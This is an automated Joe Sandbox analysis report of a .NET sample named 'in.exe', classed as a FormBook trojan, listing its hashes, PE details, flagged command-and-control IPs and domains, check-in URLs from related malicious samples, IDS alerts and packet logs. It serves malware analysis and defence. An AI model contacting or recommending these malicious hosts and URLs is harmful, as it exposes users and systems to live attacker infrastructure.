http://www.sakkal.com	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.244.112	couttsagency.com	United States	46606	UNIFIEDLAYER-AS-1US	true
52.128.23.153	www.industry-automation.com	United States	19324	DOSARRESTUS	true
156.245.135.187	www.hjtzzg.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
34.102.136.180	fashionblessings.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412024
Start date:	12.05.2021
Start time:	10:49:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	in.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@10/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.9% (good quality ratio 7.9%) Quality average: 71.1% Quality standard deviation: 32.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 99 Number of non-executed functions: 154
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 20.82.209.183, 131.253.33.200, 13.107.22.200, 93.184.220.29, 13.64.90.137, 92.122.145.220, 13.88.21.125, 104.43.139.144, 168.61.161.212, 184.30.20.56, 13.107.4.50, 20.82.210.154, 92.122.213.247, 92.122.213.194, 20.54.26.129, 20.82.209.104 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, Edge-Prod-FRA.env.au.au-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, afdap.au.au-msedge.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:50:31	API Interceptor	1x Sleep call for process: in.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.128.23.153	REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe	Get hash	malicious	Browse	www.ferienschweden.com/dxe/?rL=s6Sqq23Nqxy6Bqc8f3MZosvGevB33GzO29fOayP/lE01Eq/eDpu6VUP0sUjGcOqZY2dQdVIRww==&2dqLWB=RXBtNzex
	krJF4BtzSv.exe	Get hash	malicious	Browse	www.onlineregular.com/oerg/?YL0=8pN4l4&r6A=k0e2T7kvJRK3PRo8y62ai84DWcjvpnsau5YF2j19mIw29CJGigOXt8G+epDiy588L3Hg
	PO_29_00412.exe	Get hash	malicious	Browse	www.neutrasystems.com/hw6d/?rVEt3p=S0D0v04&SPx=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcYkTRslbbC22qjAVDA==
	DHL_S390201.exe	Get hash	malicious	Browse	www.tenply.com/u2gd/?IDKPY0x=oAZBYkqsTuez1a9u+6lVnWcl/HQJuhuD2QvfP8fo+EoX0nK3YZBMl6AGY1vurgdkUfL4&Rnm=XPc43lnxP
	y6f8O0kbEB.exe	Get hash	malicious	Browse	www.clipsq.com/oerg/?mHLD_0=ujOXmawhwZWKFGghDr7+X4b1OYMZgrDZqeyOmZXhZPmqT7kE0LgD8cS3WUAvTIFghox1&ndndnZ=UtWlYrO0rhjH
	scan copy 2402021.exe	Get hash	malicious	Browse	www.ehealthak.com/edbs/?pPX=pO0puah+4fLWu/gaJSPwUdJ/22y0P48FdV7vJ0SmK5Njq7Vx485zU7W8W0MYJNonfaHF&1bj=jlK0MdGxr
	Betaling_advies.exe	Get hash	malicious	Browse	www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh
	50729032021.xlsx	Get hash	malicious	Browse	www.aideliveryrobot.com/p2io/?LPRtv=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&SH=yzu8bdqp
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb
	Shipping Documents C1216.exe	Get hash	malicious	Browse	www.toosol.com/fhg5/?idFt5Lt8=Ml/ZzGIGF1FkdUWKp7YfLz5Vhr4JtQgw1RbjRUSw4ruSIMcEU2Te3R8sgnifklbnOlMaPd/2KQ==&TZ=EjUt0xR
	9V3LjvhSMb.exe	Get hash	malicious	Browse	www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw
	RDAW-180-47D.exe	Get hash	malicious	Browse	www.oleandrindrugs.com/fhg5/?k2Jdl2Q=OaXU6X18MvJ5q1qcJjJuK08JGFlriH0N3sFKML6er8coazWxslMzDpjffI6ofnfbT4O7&OZiLRb=AnG0VF1hLTBpLbaP
	gV8xdP8bas.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L
	m5bCbJdk7l.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
	xloa.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
	rbyB1UHXxR.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll
	4137.exe	Get hash	malicious	Browse	www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp
	COAU7229898130.xlsx	Get hash	malicious	Browse	www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE
	RFQ_OB Jiefeng E&E Co Ltd.exe	Get hash	malicious	Browse	www.coursesnap.com/vxwp/?oN60n=aoI/2ttuUri1IfMVTWjSMRAkTYr7wua1r9tN8sGSVQKIq85GZ0w6gmxLUvfA/w2PCQdu&lbipbd=i48pk

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DOSARRESTUS	REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe	Get hash	malicious	Browse	52.128.23.153
	krJF4BtzSv.exe	Get hash	malicious	Browse	52.128.23.153
	PO_29_00412.exe	Get hash	malicious	Browse	52.128.23.153
	DHL_S390201.exe	Get hash	malicious	Browse	52.128.23.153
	y6f8O0kbEB.exe	Get hash	malicious	Browse	52.128.23.153
	scan copy 2402021.exe	Get hash	malicious	Browse	52.128.23.153
	Betaling_advies.exe	Get hash	malicious	Browse	52.128.23.153
	Order.exe	Get hash	malicious	Browse	52.128.23.218
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	52.128.23.153
	bank details.exe	Get hash	malicious	Browse	52.128.23.218
	50729032021.xlsx	Get hash	malicious	Browse	52.128.23.153
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	52.128.23.153
	Shipping Documents C1216.exe	Get hash	malicious	Browse	52.128.23.153
	9V3LjvhSMb.exe	Get hash	malicious	Browse	52.128.23.153
	RDAW-180-47D.exe	Get hash	malicious	Browse	52.128.23.153
	gV8xdP8bas.exe	Get hash	malicious	Browse	52.128.23.153
	m5bCbJdk7l.exe	Get hash	malicious	Browse	52.128.23.153
	xloa.exe	Get hash	malicious	Browse	52.128.23.153
	rbyB1UHXxR.exe	Get hash	malicious	Browse	52.128.23.153
	4137.exe	Get hash	malicious	Browse	52.128.23.153
UNIFIEDLAYER-AS-1US	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	export of purchase order 7484876.xlsm	Get hash	malicious	Browse	108.179.232.90
	XM7eDjwHqp.xlsm	Get hash	malicious	Browse	162.241.190.216
	QTFsui5pLN.xlsm	Get hash	malicious	Browse	108.179.232.90
	15j1TCnOiA.xlsm	Get hash	malicious	Browse	192.185.115.105
	e8eRhf3GM0.xlsm	Get hash	malicious	Browse	162.241.190.216
	SOA PDF.exe	Get hash	malicious	Browse	192.185.226.148
	djBLaxEojp.exe	Get hash	malicious	Browse	192.185.161.67
	quotation 35420PDF.exe	Get hash	malicious	Browse	192.185.41.225
	REQUEST FOR PRICE QUOTE - URGENT.pdf.exe	Get hash	malicious	Browse	162.241.24.59
	551f47ac_by_Libranalysis.xlsm	Get hash	malicious	Browse	192.185.138.180
	invoice and packing list.pdf.exe	Get hash	malicious	Browse	192.185.136.173
	PO82055.exe	Get hash	malicious	Browse	192.185.161.67
	export of document 555091.xlsm	Get hash	malicious	Browse	192.185.173.71
	file.exe	Get hash	malicious	Browse	192.185.190.186
	generated purchase order 6149057.xlsm	Get hash	malicious	Browse	162.241.55.9
	file.exe	Get hash	malicious	Browse	192.185.186.178
	fax 4044.xlsm	Get hash	malicious	Browse	192.185.173.71
	scan of document 5336227.xlsm	Get hash	malicious	Browse	162.241.55.9

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\in.exe.log Download File
Process:	C:\Users\user\Desktop\in.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.480881305081447
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	in.exe
File size:	747520
MD5:	9904ec065111725685cbe8865bf33e6d
SHA1:	b55d215d3480c6ee9178a548f2cf3b3ba00f691d
SHA256:	a9c017e2d279ba3ef817b6db811ce21af904951e7f5a7460f1ba74c563b96cb4
SHA512:	471b6b24fc96e526a2d13152addc33036ed592407aaec1c41339bcbc51e3a7eb2e712e63f90c0d6035b6685d12eda7c481cec971f4d51ecc34da117f25c6c49e
SSDEEP:	12288:U7vbJCGg2WKEE8BEEFv2JtPzbiJr68E458M:8vbEZ2WHbEBJtPypbR58
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].`..............P..T...........r... ........@.. ....................................@................................

File Icon


Icon Hash:	583cfc1c7062f870

Static PE Info

General
Entrypoint:	0x4a728a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60985DC9 [Sun May 9 22:10:17 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa7238	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x10eac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa5290	0xa5400	False	0.825068255957	data	7.68910806579	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x10eac	0x11000	False	0.243192784926	data	4.06433479757	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xa8100	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0xb8938	0x14	data
RT_VERSION	0xb895c	0x350	data
RT_MANIFEST	0xb8cbc	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright MCS 2018
Assembly Version	1.0.0.0
InternalName	ClientWellKnownEntry.exe
FileVersion	1.0.0.0
CompanyName	MCS
LegalTrademarks
Comments
ProductName	Library
ProductVersion	1.0.0.0
FileDescription	Library
OriginalFilename	ClientWellKnownEntry.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-10:52:00.776803	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49728	80	192.168.2.5	34.102.136.180
05/12/21-10:52:00.776803	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49728	80	192.168.2.5	34.102.136.180
05/12/21-10:52:00.776803	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49728	80	192.168.2.5	34.102.136.180
05/12/21-10:52:00.913438	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49728	34.102.136.180	192.168.2.5
05/12/21-10:52:37.504508	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.5	78.142.63.38
05/12/21-10:52:37.504508	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.5	78.142.63.38
05/12/21-10:52:37.504508	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.5	78.142.63.38

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 10:51:38.491656065 CEST	49720	80	192.168.2.5	162.241.244.112
May 12, 2021 10:51:38.651709080 CEST	80	49720	162.241.244.112	192.168.2.5
May 12, 2021 10:51:38.651845932 CEST	49720	80	192.168.2.5	162.241.244.112
May 12, 2021 10:51:38.652030945 CEST	49720	80	192.168.2.5	162.241.244.112
May 12, 2021 10:51:38.810420036 CEST	80	49720	162.241.244.112	192.168.2.5
May 12, 2021 10:51:39.391897917 CEST	49720	80	192.168.2.5	162.241.244.112
May 12, 2021 10:51:39.594136953 CEST	80	49720	162.241.244.112	192.168.2.5
May 12, 2021 10:51:42.803739071 CEST	80	49720	162.241.244.112	192.168.2.5
May 12, 2021 10:51:42.803838015 CEST	80	49720	162.241.244.112	192.168.2.5
May 12, 2021 10:51:42.803891897 CEST	49720	80	192.168.2.5	162.241.244.112
May 12, 2021 10:51:42.803939104 CEST	49720	80	192.168.2.5	162.241.244.112
May 12, 2021 10:51:44.502562046 CEST	49721	80	192.168.2.5	52.128.23.153
May 12, 2021 10:51:44.690224886 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:44.690406084 CEST	49721	80	192.168.2.5	52.128.23.153
May 12, 2021 10:51:44.877713919 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:44.879256010 CEST	49721	80	192.168.2.5	52.128.23.153
May 12, 2021 10:51:45.066579103 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066606998 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066623926 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066639900 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066656113 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066670895 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066689968 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066706896 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.066898108 CEST	49721	80	192.168.2.5	52.128.23.153
May 12, 2021 10:51:45.066978931 CEST	49721	80	192.168.2.5	52.128.23.153
May 12, 2021 10:51:45.069503069 CEST	80	49721	52.128.23.153	192.168.2.5
May 12, 2021 10:51:45.069771051 CEST	49721	80	192.168.2.5	52.128.23.153
May 12, 2021 10:52:00.735599995 CEST	49728	80	192.168.2.5	34.102.136.180
May 12, 2021 10:52:00.776504993 CEST	80	49728	34.102.136.180	192.168.2.5
May 12, 2021 10:52:00.776633024 CEST	49728	80	192.168.2.5	34.102.136.180
May 12, 2021 10:52:00.776803017 CEST	49728	80	192.168.2.5	34.102.136.180
May 12, 2021 10:52:00.817569971 CEST	80	49728	34.102.136.180	192.168.2.5
May 12, 2021 10:52:00.913438082 CEST	80	49728	34.102.136.180	192.168.2.5
May 12, 2021 10:52:00.913465023 CEST	80	49728	34.102.136.180	192.168.2.5
May 12, 2021 10:52:00.913748026 CEST	49728	80	192.168.2.5	34.102.136.180
May 12, 2021 10:52:00.913882017 CEST	49728	80	192.168.2.5	34.102.136.180
May 12, 2021 10:52:00.954471111 CEST	80	49728	34.102.136.180	192.168.2.5
May 12, 2021 10:52:06.158664942 CEST	49729	80	192.168.2.5	156.245.135.187
May 12, 2021 10:52:09.163969040 CEST	49729	80	192.168.2.5	156.245.135.187
May 12, 2021 10:52:15.195586920 CEST	49729	80	192.168.2.5	156.245.135.187
May 12, 2021 10:52:29.814469099 CEST	49732	80	192.168.2.5	156.245.135.187
May 12, 2021 10:52:32.806543112 CEST	49732	80	192.168.2.5	156.245.135.187
May 12, 2021 10:52:38.822592974 CEST	49732	80	192.168.2.5	156.245.135.187

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 10:50:21.843561888 CEST	53	64344	8.8.8.8	192.168.2.5
May 12, 2021 10:50:21.866703033 CEST	62060	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:21.897449017 CEST	61805	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:21.925203085 CEST	53	62060	8.8.8.8	192.168.2.5
May 12, 2021 10:50:21.948980093 CEST	53	61805	8.8.8.8	192.168.2.5
May 12, 2021 10:50:22.194749117 CEST	54795	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:22.243382931 CEST	53	54795	8.8.8.8	192.168.2.5
May 12, 2021 10:50:22.564454079 CEST	49557	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:22.613171101 CEST	53	49557	8.8.8.8	192.168.2.5
May 12, 2021 10:50:24.006638050 CEST	61733	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:24.055366993 CEST	53	61733	8.8.8.8	192.168.2.5
May 12, 2021 10:50:25.653377056 CEST	65447	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:25.702028036 CEST	53	65447	8.8.8.8	192.168.2.5
May 12, 2021 10:50:27.248128891 CEST	52441	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:27.298549891 CEST	53	52441	8.8.8.8	192.168.2.5
May 12, 2021 10:50:27.784967899 CEST	62176	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:27.845527887 CEST	53	62176	8.8.8.8	192.168.2.5
May 12, 2021 10:50:29.671991110 CEST	59596	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:29.722271919 CEST	53	59596	8.8.8.8	192.168.2.5
May 12, 2021 10:50:31.327117920 CEST	65296	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:31.378633976 CEST	53	65296	8.8.8.8	192.168.2.5
May 12, 2021 10:50:32.410690069 CEST	63183	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:32.459520102 CEST	53	63183	8.8.8.8	192.168.2.5
May 12, 2021 10:50:33.498476028 CEST	60151	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:33.551284075 CEST	53	60151	8.8.8.8	192.168.2.5
May 12, 2021 10:50:35.030141115 CEST	56969	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:35.080707073 CEST	53	56969	8.8.8.8	192.168.2.5
May 12, 2021 10:50:35.986396074 CEST	55161	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:36.037976980 CEST	53	55161	8.8.8.8	192.168.2.5
May 12, 2021 10:50:45.644658089 CEST	54757	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:45.709760904 CEST	53	54757	8.8.8.8	192.168.2.5
May 12, 2021 10:50:59.354511023 CEST	49992	53	192.168.2.5	8.8.8.8
May 12, 2021 10:50:59.415415049 CEST	53	49992	8.8.8.8	192.168.2.5
May 12, 2021 10:51:17.172360897 CEST	60075	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:17.224124908 CEST	53	60075	8.8.8.8	192.168.2.5
May 12, 2021 10:51:34.953578949 CEST	55016	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:35.016129971 CEST	53	55016	8.8.8.8	192.168.2.5
May 12, 2021 10:51:38.331152916 CEST	64345	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:38.482887030 CEST	53	64345	8.8.8.8	192.168.2.5
May 12, 2021 10:51:44.401118040 CEST	57128	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:44.501290083 CEST	53	57128	8.8.8.8	192.168.2.5
May 12, 2021 10:51:46.456824064 CEST	54791	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:46.518285036 CEST	53	54791	8.8.8.8	192.168.2.5
